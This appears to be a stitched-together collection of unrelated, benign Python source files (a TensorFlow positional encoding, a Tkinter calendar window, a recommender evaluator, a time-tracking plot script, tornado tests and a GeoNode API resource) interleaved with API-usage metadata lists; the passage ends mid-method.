'Vector', (['[1, 4]'], {}), '([1, 4])\n', (698, 706), False, 'from homeworks.homework_1.task_1.vector import Vector\n'), ((1049, 1075), 'homeworks.homework_1.task_1.vector.Vector', 'Vector', (['[1, -2.97, -1.065]'], {}), '([1, -2.97, -1.065])\n', (1055, 1075), False, 'from homeworks.homework_1.task_1.vector import Vector\n'), ((1214, 1231), 'homeworks.homework_1.task_1.vector.Vector', 'Vector', (['[1, 3, 4]'], {}), '([1, 3, 4])\n', (1220, 1231), False, 'from homeworks.homework_1.task_1.vector import Vector\n'), ((1543, 1569), 'homeworks.homework_1.task_1.vector.Vector', 'Vector', (['[1, -2.97, -1.065]'], {}), '([1, -2.97, -1.065])\n', (1549, 1569), False, 'from homeworks.homework_1.task_1.vector import Vector\n'), ((297, 311), 'homeworks.homework_1.task_1.vector.Vector', 'Vector', (['[3, 4]'], {}), '([3, 4])\n', (303, 311), False, 'from homeworks.homework_1.task_1.vector import Vector\n'), ((390, 411), 'homeworks.homework_1.task_1.vector.Vector', 'Vector', (['[0.1, 4, 3.5]'], {}), '([0.1, 4, 3.5])\n', (396, 411), False, 'from homeworks.homework_1.task_1.vector import Vector\n'), ((548, 562), 'homeworks.homework_1.task_1.vector.Vector', 'Vector', (['[1, 2]'], {}), '([1, 2])\n', (554, 562), False, 'from homeworks.homework_1.task_1.vector import Vector\n'), ((662, 676), 'homeworks.homework_1.task_1.vector.Vector', 'Vector', (['[2, 3]'], {}), '([2, 3])\n', (668, 676), False, 'from homeworks.homework_1.task_1.vector import Vector\n'), ((1007, 1033), 'homeworks.homework_1.task_1.vector.Vector', 'Vector', (['[1, -2.97, -1.065]'], {}), '([1, -2.97, -1.065])\n', (1013, 1033), False, 'from homeworks.homework_1.task_1.vector import Vector\n'), ((1193, 1207), 'homeworks.homework_1.task_1.vector.Vector', 'Vector', (['[1, 2]'], {}), '([1, 2])\n', (1199, 1207), False, 'from homeworks.homework_1.task_1.vector import Vector\n'), ((1510, 1536), 'homeworks.homework_1.task_1.vector.Vector', 'Vector', (['[1, -2.97, -1.065]'], {}), '([1, -2.97, -1.065])\n', (1516, 1536), False, 'from homeworks.homework_1.task_1.vector import Vector\n'), ((216, 226), 'homeworks.homework_1.task_1.vector.Vector', 'Vector', (['[]'], {}), '([])\n', (222, 226), False, 'from homeworks.homework_1.task_1.vector import Vector\n')]
|
import numpy as np
import tensorflow as tf
class PositionalEncodings(tf.keras.Model):
"""Sinusoidal positional encoding generator.
"""
def __init__(self, channels: int, presize: int = 128):
"""Initializer.
Args:
channels: size of the channels.
presize: initial pe cache size.
"""
super().__init__()
self.channels = channels
self.size = presize
self.buffer = self.generate(presize)
def call(self, size: int) -> tf.Tensor:
"""Return cached positional encodings.
Args:
size: length of the pe.
Returns:
[tf.float32; [T, C]], sinusoidal positional encodings.
"""
if size <= self.size:
return self.buffer[:size]
# generate new cache
self.buffer = self.generate(size)
return self.buffer
def generate(self, size: int) -> tf.Tensor:
"""Generate positional encodings.
Args:
size: length of the pe.
Returns:
[tf.float32; [T, C]], sinusoidal positional encodings.
"""
# [tf.int32; [T]]
pos = tf.range(size)
# [tf.int32; [C//2]]
i = tf.range(0, self.channels, 2)
# [C//C], casting for float64
denom = tf.exp(-np.log(10000) * tf.cast(i / self.channels, tf.float32))
# [T, C//2]
context = tf.cast(pos, tf.float32)[:, None] * denom[None]
# [T, C//2, 1]
context = context[..., None]
# [T, C//2, 2]
pe = tf.concat([tf.sin(context), tf.cos(context)], axis=-1)
# [T, C]
pe = tf.reshape(pe, [size, self.channels])
return pe
|
[
"tensorflow.range",
"tensorflow.sin",
"numpy.log",
"tensorflow.reshape",
"tensorflow.cast",
"tensorflow.cos"
] |
[((1155, 1169), 'tensorflow.range', 'tf.range', (['size'], {}), '(size)\n', (1163, 1169), True, 'import tensorflow as tf\n'), ((1211, 1240), 'tensorflow.range', 'tf.range', (['(0)', 'self.channels', '(2)'], {}), '(0, self.channels, 2)\n', (1219, 1240), True, 'import tensorflow as tf\n'), ((1626, 1663), 'tensorflow.reshape', 'tf.reshape', (['pe', '[size, self.channels]'], {}), '(pe, [size, self.channels])\n', (1636, 1663), True, 'import tensorflow as tf\n'), ((1319, 1357), 'tensorflow.cast', 'tf.cast', (['(i / self.channels)', 'tf.float32'], {}), '(i / self.channels, tf.float32)\n', (1326, 1357), True, 'import tensorflow as tf\n'), ((1397, 1421), 'tensorflow.cast', 'tf.cast', (['pos', 'tf.float32'], {}), '(pos, tf.float32)\n', (1404, 1421), True, 'import tensorflow as tf\n'), ((1552, 1567), 'tensorflow.sin', 'tf.sin', (['context'], {}), '(context)\n', (1558, 1567), True, 'import tensorflow as tf\n'), ((1569, 1584), 'tensorflow.cos', 'tf.cos', (['context'], {}), '(context)\n', (1575, 1584), True, 'import tensorflow as tf\n'), ((1303, 1316), 'numpy.log', 'np.log', (['(10000)'], {}), '(10000)\n', (1309, 1316), True, 'import numpy as np\n')]
|
from tkinter import *
from PIL import Image, ImageTk
import Utils
import MainGUI
def day_gui(day_date):
# Create the frame
root = Tk()
# Initialisation of some useful variables
last_click_x = 0
last_click_y = 0
root_width = 700
root_height = 400
# Definition of some useful functions
def get_picture(path, is_day_picture):
if is_day_picture:
try:
picture = Image.open(Utils.get_resources_path("resources\\day\\day_" + str(day_date) + ".png"))
resized_picture = picture.resize((700, 350), Image.ANTIALIAS)
return ImageTk.PhotoImage(resized_picture)
except FileNotFoundError:
try:
return PhotoImage(file=Utils.get_resources_path("resources\\day\\not_found.png"))
except TclError:
pass
else:
try:
return PhotoImage(file=Utils.get_resources_path("resources\\" + path))
except TclError:
pass
def get_title(date):
if date == 1:
return "December 1st"
elif date == 2:
return "December 2nd"
elif date == 3:
return "December 3rd"
else:
return "December " + str(date) + "th"
def move_frame(event):
x, y = event.x - last_click_x + root.winfo_x(), event.y - last_click_y + root.winfo_y()
root.geometry("+%s+%s" % (x, y))
def mapped_frame(event):
root.overrideredirect(True)
def reduce_frame():
Utils.button_click_sound(False)
root.state('withdrawn')
root.overrideredirect(False)
root.state('iconic')
def close_frame():
Utils.button_click_sound(False)
root.destroy()
MainGUI.main_gui()
# Set basic parameters of frame
root.wm_attributes("-topmost", True)
root.geometry("700x400")
root.resizable(width=False, height=False)
root.iconbitmap(Utils.get_resources_path("resources\\icon\\app_icon.ico"))
root.bind("<Map>", mapped_frame)
# Add components to frame
label_background = Label(bg="white", width=700, height=400, bd=0)
label_background.place(x=0, y=0)
label_title = Label(text=get_title(day_date), font=("Segoe Script", 18), bd=0, bg="White")
label_title.place(x=root_width / 2 - label_title.winfo_reqwidth() / 2,
y=25 - label_title.winfo_reqheight() / 2)
label_move_area_picture = get_picture("day_move.png", False)
label_move_area = Label(image=label_move_area_picture, width=40, height=40, bd=0)
label_move_area.place(x=5, y=5)
label_move_area.bind("<B1-Motion>", move_frame)
button_reduce_picture = get_picture("buttons\\day_reduce.png", False)
button_reduce = Button(image=button_reduce_picture, bd=0, highlightthickness=0,
padx=40, pady=10, command=reduce_frame)
button_reduce.place(x=610, y=20)
button_close_picture = get_picture("buttons\\day_close.png", False)
button_close = Button(image=button_close_picture, bd=0, highlightthickness=0, padx=40, pady=40, command=close_frame)
button_close.place(x=655, y=5)
label_day_picture = get_picture(day_date, True)
label_day = Label(image=label_day_picture, width=700, height=350, bd=0)
label_day.place(x=0, y=50)
# Loop the frame
root.mainloop()
|
[
"PIL.ImageTk.PhotoImage",
"Utils.get_resources_path",
"Utils.button_click_sound",
"MainGUI.main_gui"
] |
[((1573, 1604), 'Utils.button_click_sound', 'Utils.button_click_sound', (['(False)'], {}), '(False)\n', (1597, 1604), False, 'import Utils\n'), ((1735, 1766), 'Utils.button_click_sound', 'Utils.button_click_sound', (['(False)'], {}), '(False)\n', (1759, 1766), False, 'import Utils\n'), ((1798, 1816), 'MainGUI.main_gui', 'MainGUI.main_gui', ([], {}), '()\n', (1814, 1816), False, 'import MainGUI\n'), ((1991, 2048), 'Utils.get_resources_path', 'Utils.get_resources_path', (['"""resources\\\\icon\\\\app_icon.ico"""'], {}), "('resources\\\\icon\\\\app_icon.ico')\n", (2015, 2048), False, 'import Utils\n'), ((624, 659), 'PIL.ImageTk.PhotoImage', 'ImageTk.PhotoImage', (['resized_picture'], {}), '(resized_picture)\n', (642, 659), False, 'from PIL import Image, ImageTk\n'), ((949, 995), 'Utils.get_resources_path', 'Utils.get_resources_path', (["('resources\\\\' + path)"], {}), "('resources\\\\' + path)\n", (973, 995), False, 'import Utils\n'), ((762, 819), 'Utils.get_resources_path', 'Utils.get_resources_path', (['"""resources\\\\day\\\\not_found.png"""'], {}), "('resources\\\\day\\\\not_found.png')\n", (786, 819), False, 'import Utils\n')]
|
class Evaluator(object):
"""
Compute metrics for recommendations that have been written to file.
Parameters
----------
compute_metrics : function(list,list)
The evaluation function which should accept two lists of predicted
and actual item indices.
max_items : int
The number of recommendations needed to compute the evaluation function.
"""
def __init__(self,compute_metrics,max_items):
self.compute_metrics = compute_metrics
self.max_items = max_items
def _add_metrics(self,predicted,actual):
metrics = self.compute_metrics(predicted,actual)
if metrics:
for m,val in metrics.iteritems():
self.cum_metrics[m] += val
self.count += 1
def process(self,testdata,recsfile,start,end,offset=1):
"""
Parameters
----------
testdata : scipy sparse matrix
The test items for each user.
recsfile : str
Filepath to the recommendations. The file should contain TSV
of the form: user, item, score. IMPORTANT: the recommendations must
be sorted by user and score.
start : int
First user to evaluate.
end: int
One after the last user to evaluate.
offset : int
Index offset for users and items in recommendations file.
Returns
-------
cum_metrics : dict
Aggregated metrics i.e. total values for all users.
count : int
The number of users for whom metrics were computed.
"""
from collections import defaultdict
self.cum_metrics = defaultdict(float)
self.count = 0
last_user = start
recs = []
for line in open(recsfile):
user,item,score = line.strip().split('\t')
user = int(user)-1 # convert to 0-indxed
item = int(item)-1
if user >= end:
break
if user < start:
continue
if user != last_user:
self._add_metrics(recs,testdata[last_user,:].indices.tolist())
last_user = user
recs = []
if len(recs) < self.max_items:
recs.append(item)
self._add_metrics(recs,testdata[last_user,:].indices.tolist())
return self.cum_metrics,self.count
|
[
"collections.defaultdict"
] |
[((1684, 1702), 'collections.defaultdict', 'defaultdict', (['float'], {}), '(float)\n', (1695, 1702), False, 'from collections import defaultdict\n')]
|
from django.db.models import BooleanField, CharField, TextField
from wab.core.components.models import BaseModel
class EmailTemplate(BaseModel):
code = CharField("Specific code for core app", max_length=50, blank=True, null=True, editable=False, unique=True)
is_protected = BooleanField("Is protected", default=False)
content = TextField("Html content")
|
[
"django.db.models.CharField",
"django.db.models.TextField",
"django.db.models.BooleanField"
] |
[((159, 270), 'django.db.models.CharField', 'CharField', (['"""Specific code for core app"""'], {'max_length': '(50)', 'blank': '(True)', 'null': '(True)', 'editable': '(False)', 'unique': '(True)'}), "('Specific code for core app', max_length=50, blank=True, null=\n True, editable=False, unique=True)\n", (168, 270), False, 'from django.db.models import BooleanField, CharField, TextField\n'), ((285, 328), 'django.db.models.BooleanField', 'BooleanField', (['"""Is protected"""'], {'default': '(False)'}), "('Is protected', default=False)\n", (297, 328), False, 'from django.db.models import BooleanField, CharField, TextField\n'), ((343, 368), 'django.db.models.TextField', 'TextField', (['"""Html content"""'], {}), "('Html content')\n", (352, 368), False, 'from django.db.models import BooleanField, CharField, TextField\n')]
|
#!/usr/bin/env python3
# Copyright 2021 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Plot cumulative time based on daily time reporting data."""
from typing import List
from typing import Optional
from typing import Union
from datetime import date
import matplotlib.dates as mdates
import matplotlib.pyplot as plt
import matplotlib.ticker as ticker
import numpy as np
import pandas as pd
include_plot_title = True
save_plots = True
def load_csv(filename: str) -> np.array:
with open(filename, 'rb') as file:
return np.loadtxt(
file,
delimiter=',',
skiprows=1,
usecols=(0,1),
dtype=str,
)
def filter_data(data: np.array) -> np.array:
return np.array([d for d in data if d[0] not in ('', 'total')])
def convert_data(data: np.array) -> np.array:
return np.array([[date.fromisoformat(d[0]), float(d[1])] for d in data])
def add_zeroth_datapoint(data: np.array) -> np.array:
return np.vstack([[[data[0,0], 0.0]], data])
def data_to_cumsum(data: np.array, col: int = 1) -> np.array:
data[:,col] = np.cumsum(data[:,col])
return data
def get_data(filename: str):
data = load_csv(filename)
data = filter_data(data)
data = convert_data(data)
data = add_zeroth_datapoint(data)
data = data_to_cumsum(data)
return data
def format_filename(string: str) -> str:
string = string.replace('(', '')
string = string.replace(')', '')
string = string.replace(' ', '_')
string = string.replace('\\', '')
return string.lower()
def plot_data(
data: np.array,
title: str,
major_formatter_str: str,
major_locator: Optional[mdates.RRuleLocator] = None,
yaxis_multiple_locator: Optional[int] = None,
colour: str = 'blue',
) -> None:
fig, ax = plt.subplots(1, 1)
ax.plot(data[:,0], data[:,1], '-', color=colour)
if include_plot_title:
ax.set(title=title)
ax.set(ylabel='cumulative time (h)')
if major_locator:
ax.xaxis.set_major_locator(major_locator)
ax.xaxis.set_major_formatter(mdates.DateFormatter(major_formatter_str))
if yaxis_multiple_locator:
ax.yaxis.set_major_locator(ticker.MultipleLocator(yaxis_multiple_locator))
ax.set_ylim(0)
ax.grid()
fig.autofmt_xdate()
if save_plots:
filename = format_filename(title)
fig.savefig(f'{filename}.png', bbox_inches='tight')
fig.savefig(f'{filename}.svg', bbox_inches='tight')
def plot_data_compare(
data: List[np.array],
title: str,
legends: List[str],
major_formatter_str: str,
major_locator: Optional[mdates.RRuleLocator] = None,
yaxis_multiple_locator: Optional[int] = None,
colours: Union[str, List[str]] = 'blue',
) -> None:
fig, ax = plt.subplots(1, 1)
for i in range(len(data)):
colour = colours if isinstance(colours, str) else colours[i]
d = data[i]
ax.plot(d[:,0], d[:,1], '-', color=colour)
total_time = d[-1,1]
legends[i] = legends[i] + f' ({total_time:g} h)'
if include_plot_title:
ax.set(title=title)
ax.set(ylabel='cumulative time (h)')
if major_locator:
ax.xaxis.set_major_locator(major_locator)
ax.xaxis.set_major_formatter(mdates.DateFormatter(major_formatter_str))
if yaxis_multiple_locator:
ax.yaxis.set_major_locator(ticker.MultipleLocator(yaxis_multiple_locator))
ax.set_ylim(0)
ax.legend(legends)#, loc='center', bbox_to_anchor=(0.3, 0.8))
ax.grid()
fig.autofmt_xdate()
if save_plots:
filename = format_filename(title)
fig.savefig(f'{filename}.png', bbox_inches='tight')
fig.savefig(f'{filename}.svg', bbox_inches='tight')
def main():
plt.rc('text', usetex=True)
plt.rc('font', family='serif', size=14)
plt.rc('axes', titlesize=20)
plt.rc('legend', fontsize=14)
# Under File, Download -> Comma-separated values (.csv, current sheet),
# download the 'Time' and 'Blog' sheets
data_time = get_data('rmw_email time tracking - Code.csv')
data_blog = get_data('rmw_email time tracking - Blog.csv')
plot_data(
data_time,
'rmw\_email code time investment',
'%Y %B',
colour='green',
)
plot_data(
data_blog,
'rmw\_email blog post time investment',
'%Y-%b-%d',
mdates.DayLocator((1,5,10,15,20,25)),
yaxis_multiple_locator=5,
colour='blue',
)
plot_data_compare(
[data_time, data_blog],
'Overall rmw\_email time investment',
['code', 'blog post'],
'%Y %B',
colours=['green', 'blue'],
)
plt.show()
if __name__ == '__main__':
main()
|
[
"matplotlib.pyplot.show",
"matplotlib.dates.DayLocator",
"numpy.cumsum",
"matplotlib.dates.DateFormatter",
"datetime.date.fromisoformat",
"numpy.array",
"matplotlib.pyplot.rc",
"numpy.loadtxt",
"matplotlib.ticker.MultipleLocator",
"matplotlib.pyplot.subplots",
"numpy.vstack"
] |
[((1244, 1300), 'numpy.array', 'np.array', (["[d for d in data if d[0] not in ('', 'total')]"], {}), "([d for d in data if d[0] not in ('', 'total')])\n", (1252, 1300), True, 'import numpy as np\n'), ((1493, 1531), 'numpy.vstack', 'np.vstack', (['[[[data[0, 0], 0.0]], data]'], {}), '([[[data[0, 0], 0.0]], data])\n', (1502, 1531), True, 'import numpy as np\n'), ((1613, 1636), 'numpy.cumsum', 'np.cumsum', (['data[:, col]'], {}), '(data[:, col])\n', (1622, 1636), True, 'import numpy as np\n'), ((2318, 2336), 'matplotlib.pyplot.subplots', 'plt.subplots', (['(1)', '(1)'], {}), '(1, 1)\n', (2330, 2336), True, 'import matplotlib.pyplot as plt\n'), ((3287, 3305), 'matplotlib.pyplot.subplots', 'plt.subplots', (['(1)', '(1)'], {}), '(1, 1)\n', (3299, 3305), True, 'import matplotlib.pyplot as plt\n'), ((4246, 4273), 'matplotlib.pyplot.rc', 'plt.rc', (['"""text"""'], {'usetex': '(True)'}), "('text', usetex=True)\n", (4252, 4273), True, 'import matplotlib.pyplot as plt\n'), ((4278, 4317), 'matplotlib.pyplot.rc', 'plt.rc', (['"""font"""'], {'family': '"""serif"""', 'size': '(14)'}), "('font', family='serif', size=14)\n", (4284, 4317), True, 'import matplotlib.pyplot as plt\n'), ((4322, 4350), 'matplotlib.pyplot.rc', 'plt.rc', (['"""axes"""'], {'titlesize': '(20)'}), "('axes', titlesize=20)\n", (4328, 4350), True, 'import matplotlib.pyplot as plt\n'), ((4355, 4384), 'matplotlib.pyplot.rc', 'plt.rc', (['"""legend"""'], {'fontsize': '(14)'}), "('legend', fontsize=14)\n", (4361, 4384), True, 'import matplotlib.pyplot as plt\n'), ((5164, 5174), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (5172, 5174), True, 'import matplotlib.pyplot as plt\n'), ((1045, 1115), 'numpy.loadtxt', 'np.loadtxt', (['file'], {'delimiter': '""","""', 'skiprows': '(1)', 'usecols': '(0, 1)', 'dtype': 'str'}), "(file, delimiter=',', skiprows=1, usecols=(0, 1), dtype=str)\n", (1055, 1115), True, 'import numpy as np\n'), ((2593, 2634), 'matplotlib.dates.DateFormatter', 'mdates.DateFormatter', (['major_formatter_str'], {}), '(major_formatter_str)\n', (2613, 2634), True, 'import matplotlib.dates as mdates\n'), ((3766, 3807), 'matplotlib.dates.DateFormatter', 'mdates.DateFormatter', (['major_formatter_str'], {}), '(major_formatter_str)\n', (3786, 3807), True, 'import matplotlib.dates as mdates\n'), ((4867, 4908), 'matplotlib.dates.DayLocator', 'mdates.DayLocator', (['(1, 5, 10, 15, 20, 25)'], {}), '((1, 5, 10, 15, 20, 25))\n', (4884, 4908), True, 'import matplotlib.dates as mdates\n'), ((2702, 2748), 'matplotlib.ticker.MultipleLocator', 'ticker.MultipleLocator', (['yaxis_multiple_locator'], {}), '(yaxis_multiple_locator)\n', (2724, 2748), True, 'import matplotlib.ticker as ticker\n'), ((3875, 3921), 'matplotlib.ticker.MultipleLocator', 'ticker.MultipleLocator', (['yaxis_multiple_locator'], {}), '(yaxis_multiple_locator)\n', (3897, 3921), True, 'import matplotlib.ticker as ticker\n'), ((1371, 1395), 'datetime.date.fromisoformat', 'date.fromisoformat', (['d[0]'], {}), '(d[0])\n', (1389, 1395), False, 'from datetime import date\n')]
|
import functools
import pytest
import tornado.ioloop
import tornado.web
class MainHandler(tornado.web.RequestHandler):
def get(self):
self.write('Hello, world')
application = tornado.web.Application([
(r'/', MainHandler),
(r'/f00', MainHandler),
])
@pytest.fixture(scope='module')
def app():
return application
def _fetch(http_client, url):
return http_client.io_loop.run_sync(
functools.partial(http_client.fetch, url))
def test_http_server(http_server):
status = {'done': False}
def _done():
status['done'] = True
http_server.io_loop.stop()
http_server.io_loop.add_callback(_done)
http_server.io_loop.start()
assert status['done']
def test_http_client(http_client, base_url):
request = http_client.fetch(base_url)
request.add_done_callback(lambda future: http_client.io_loop.stop())
http_client.io_loop.start()
response = request.result()
assert response.code == 200
def test_http_client_with_fetch_helper(http_client, base_url):
response = _fetch(http_client, base_url)
assert response.code == 200
@pytest.mark.gen_test
def test_http_client_with_gen_test(http_client, base_url):
response = yield http_client.fetch(base_url)
assert response.code == 200
@pytest.mark.gen_test
def test_get_url_with_path(http_client, base_url):
response = yield http_client.fetch('%s/f00' % base_url)
assert response.code == 200
@pytest.mark.gen_test
def test_http_client_raises_on_404(http_client, base_url):
with pytest.raises(tornado.httpclient.HTTPError):
yield http_client.fetch('%s/bar' % base_url)
|
[
"functools.partial",
"pytest.raises",
"pytest.fixture"
] |
[((276, 306), 'pytest.fixture', 'pytest.fixture', ([], {'scope': '"""module"""'}), "(scope='module')\n", (290, 306), False, 'import pytest\n'), ((422, 463), 'functools.partial', 'functools.partial', (['http_client.fetch', 'url'], {}), '(http_client.fetch, url)\n', (439, 463), False, 'import functools\n'), ((1542, 1585), 'pytest.raises', 'pytest.raises', (['tornado.httpclient.HTTPError'], {}), '(tornado.httpclient.HTTPError)\n', (1555, 1585), False, 'import pytest\n')]
|
# -*- coding: utf-8 -*-
#########################################################################
#
# Copyright (C) 2016 OSGeo
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
#########################################################################
import re
import json
import logging
from django.urls import resolve
from django.db.models import Q
from django.http import HttpResponse
from django.conf import settings
from django.contrib.staticfiles.templatetags import staticfiles
from tastypie.authentication import MultiAuthentication, SessionAuthentication
from django.template.response import TemplateResponse
from tastypie import http
from tastypie.bundle import Bundle
from tastypie.constants import ALL, ALL_WITH_RELATIONS
from tastypie.resources import ModelResource
from tastypie import fields
from tastypie.utils import trailing_slash
from guardian.shortcuts import get_objects_for_user
from django.conf.urls import url
from django.core.paginator import Paginator, InvalidPage
from django.http import Http404
from django.core.exceptions import ObjectDoesNotExist
from django.forms.models import model_to_dict
from tastypie.utils.mime import build_content_type
from geonode import get_version, qgis_server, geoserver
from geonode.layers.models import Layer
from geonode.maps.models import Map
from geonode.documents.models import Document
from geonode.base.models import ResourceBase
from geonode.base.models import HierarchicalKeyword
from geonode.groups.models import GroupProfile
from geonode.utils import check_ogc_backend
from geonode.security.utils import get_visible_resources
from .authentication import OAuthAuthentication
from .authorization import GeoNodeAuthorization, GeonodeApiKeyAuthentication
from .api import (
TagResource,
RegionResource,
OwnersResource,
ThesaurusKeywordResource,
TopicCategoryResource,
GroupResource,
FILTER_TYPES)
from .paginator import CrossSiteXHRPaginator
from django.utils.translation import gettext as _
if settings.HAYSTACK_SEARCH:
from haystack.query import SearchQuerySet # noqa
logger = logging.getLogger(__name__)
LAYER_SUBTYPES = {
'vector': 'dataStore',
'raster': 'coverageStore',
'remote': 'remoteStore',
'vector_time': 'vectorTimeSeries',
}
FILTER_TYPES.update(LAYER_SUBTYPES)
class CommonMetaApi:
authorization = GeoNodeAuthorization()
allowed_methods = ['get']
filtering = {
'title': ALL,
'keywords': ALL_WITH_RELATIONS,
'tkeywords': ALL_WITH_RELATIONS,
'regions': ALL_WITH_RELATIONS,
'category': ALL_WITH_RELATIONS,
'group': ALL_WITH_RELATIONS,
'owner': ALL_WITH_RELATIONS,
'date': ALL,
'purpose': ALL,
'abstract': ALL
}
ordering = ['date', 'title', 'popular_count']
max_limit = None
class CommonModelApi(ModelResource):
keywords = fields.ToManyField(TagResource, 'keywords', null=True)
regions = fields.ToManyField(RegionResource, 'regions', null=True)
category = fields.ToOneField(
TopicCategoryResource,
'category',
null=True,
full=True)
group = fields.ToOneField(
GroupResource,
'group',
null=True,
full=True)
owner = fields.ToOneField(OwnersResource, 'owner', full=True)
tkeywords = fields.ToManyField(
ThesaurusKeywordResource, 'tkeywords', null=True)
VALUES = [
# fields in the db
'id',
'uuid',
'title',
'date',
'date_type',
'edition',
'purpose',
'maintenance_frequency',
'restriction_code_type',
'constraints_other',
'license',
'language',
'spatial_representation_type',
'temporal_extent_start',
'temporal_extent_end',
'data_quality_statement',
'abstract',
'csw_wkt_geometry',
'csw_type',
'owner__username',
'share_count',
'popular_count',
'srid',
'bbox_x0',
'bbox_x1',
'bbox_y0',
'bbox_y1',
'category__gn_description',
'supplemental_information',
'site_url',
'thumbnail_url',
'detail_url',
'rating',
'group__name',
'has_time',
'is_approved',
'is_published',
'dirty_state',
]
def build_filters(self, filters=None, ignore_bad_filters=False, **kwargs):
if filters is None:
filters = {}
orm_filters = super(CommonModelApi, self).build_filters(
filters=filters, ignore_bad_filters=ignore_bad_filters, **kwargs)
if 'type__in' in filters and filters['type__in'] in FILTER_TYPES.keys():
orm_filters.update({'type': filters.getlist('type__in')})
if 'app_type__in' in filters:
orm_filters.update({'polymorphic_ctype__model': filters['app_type__in'].lower()})
if 'extent' in filters:
orm_filters.update({'extent': filters['extent']})
orm_filters['f_method'] = filters['f_method'] if 'f_method' in filters else 'and'
if not settings.SEARCH_RESOURCES_EXTENDED:
return self._remove_additional_filters(orm_filters)
return orm_filters
def _remove_additional_filters(self, orm_filters):
orm_filters.pop('abstract__icontains', None)
orm_filters.pop('purpose__icontains', None)
orm_filters.pop('f_method', None)
return orm_filters
def apply_filters(self, request, applicable_filters):
types = applicable_filters.pop('type', None)
extent = applicable_filters.pop('extent', None)
keywords = applicable_filters.pop('keywords__slug__in', None)
filtering_method = applicable_filters.pop('f_method', 'and')
if filtering_method == 'or':
filters = Q()
for f in applicable_filters.items():
filters |= Q(f)
semi_filtered = self.get_object_list(request).filter(filters)
else:
semi_filtered = super(
CommonModelApi,
self).apply_filters(
request,
applicable_filters)
filtered = None
if types:
for the_type in types:
if the_type in LAYER_SUBTYPES.keys():
super_type = the_type
if 'vector_time' == the_type:
super_type = 'vector'
if filtered:
if 'time' in the_type:
filtered = filtered | semi_filtered.filter(
Layer___storeType=LAYER_SUBTYPES[super_type]).exclude(Layer___has_time=False)
else:
filtered = filtered | semi_filtered.filter(
Layer___storeType=LAYER_SUBTYPES[super_type])
else:
if 'time' in the_type:
filtered = semi_filtered.filter(
Layer___storeType=LAYER_SUBTYPES[super_type]).exclude(Layer___has_time=False)
else:
filtered = semi_filtered.filter(
Layer___storeType=LAYER_SUBTYPES[super_type])
else:
_type_filter = FILTER_TYPES[the_type].__name__.lower()
if filtered:
filtered = filtered | semi_filtered.filter(polymorphic_ctype__model=_type_filter)
else:
filtered = semi_filtered.filter(polymorphic_ctype__model=_type_filter)
else:
filtered = semi_filtered
if settings.RESOURCE_PUBLISHING or settings.ADMIN_MODERATE_UPLOADS:
filtered = self.filter_published(filtered, request)
if settings.GROUP_PRIVATE_RESOURCES:
filtered = self.filter_group(filtered, request)
if extent:
filtered = self.filter_bbox(filtered, extent)
if keywords:
filtered = self.filter_h_keywords(filtered, keywords)
# Hide Dirty State Resources
user = request.user if request else None
if not user or not user.is_superuser:
if user:
filtered = filtered.exclude(Q(dirty_state=True) & ~(
Q(owner__username__iexact=str(user))))
else:
filtered = filtered.exclude(Q(dirty_state=True))
return filtered
def filter_published(self, queryset, request):
filter_set = get_visible_resources(
queryset,
request.user if request else None,
request=request,
admin_approval_required=settings.ADMIN_MODERATE_UPLOADS,
unpublished_not_visible=settings.RESOURCE_PUBLISHING)
return filter_set
def filter_group(self, queryset, request):
filter_set = get_visible_resources(
queryset,
request.user if request else None,
request=request,
private_groups_not_visibile=settings.GROUP_PRIVATE_RESOURCES)
return filter_set
def filter_h_keywords(self, queryset, keywords):
filtered = queryset
treeqs = HierarchicalKeyword.objects.none()
if keywords and len(keywords) > 0:
for keyword in keywords:
try:
kws = HierarchicalKeyword.objects.filter(
Q(name__iexact=keyword) | Q(slug__iexact=keyword))
for kw in kws:
treeqs = treeqs | HierarchicalKeyword.get_tree(kw)
except ObjectDoesNotExist:
# Ignore keywords not actually used?
pass
filtered = queryset.filter(Q(keywords__in=treeqs))
return filtered
def filter_bbox(self, queryset, extent_filter):
from geonode.utils import bbox_to_projection
bbox = extent_filter.split(',')
bbox = list(map(str, bbox))
intersects = (Q(bbox_x0__gte=bbox[0]) & Q(bbox_x1__lte=bbox[2]) &
Q(bbox_y0__gte=bbox[1]) & Q(bbox_y1__lte=bbox[3]))
for proj in Layer.objects.order_by('srid').values('srid').distinct():
if proj['srid'] != 'EPSG:4326':
proj_bbox = bbox_to_projection(bbox + ['4326', ],
target_srid=int(proj['srid'][5:]))
if proj_bbox[-1] != 4326:
intersects = intersects | (Q(bbox_x0__gte=proj_bbox[0]) & Q(bbox_x1__lte=proj_bbox[2]) & Q(
bbox_y0__gte=proj_bbox[1]) & Q(bbox_y1__lte=proj_bbox[3]))
return queryset.filter(intersects)
def build_haystack_filters(self, parameters):
from haystack.inputs import Raw
from haystack.query import SearchQuerySet, SQ # noqa
sqs = None
# Retrieve Query Params
# Text search
query = parameters.get('q', None)
# Types and subtypes to filter (map, layer, vector, etc)
type_facets = parameters.getlist("type__in", [])
# If coming from explore page, add type filter from resource_name
resource_filter = self._meta.resource_name.rstrip("s")
if resource_filter != "base" and resource_filter not in type_facets:
type_facets.append(resource_filter)
# Publication date range (start,end)
date_end = parameters.get("date__lte", None)
date_start = parameters.get("date__gte", None)
# Topic category filter
category = parameters.getlist("category__identifier__in")
# Keyword filter
keywords = parameters.getlist("keywords__slug__in")
# Region filter
regions = parameters.getlist("regions__name__in")
# Owner filters
owner = parameters.getlist("owner__username__in")
# Sort order
sort = parameters.get("order_by", "relevance")
# Geospatial Elements
bbox = parameters.get("extent", None)
# Filter by Type and subtype
if type_facets is not None:
types = []
subtypes = []
for type in type_facets:
if type in {"map", "layer", "document", "user"}:
# Type is one of our Major Types (not a sub type)
types.append(type)
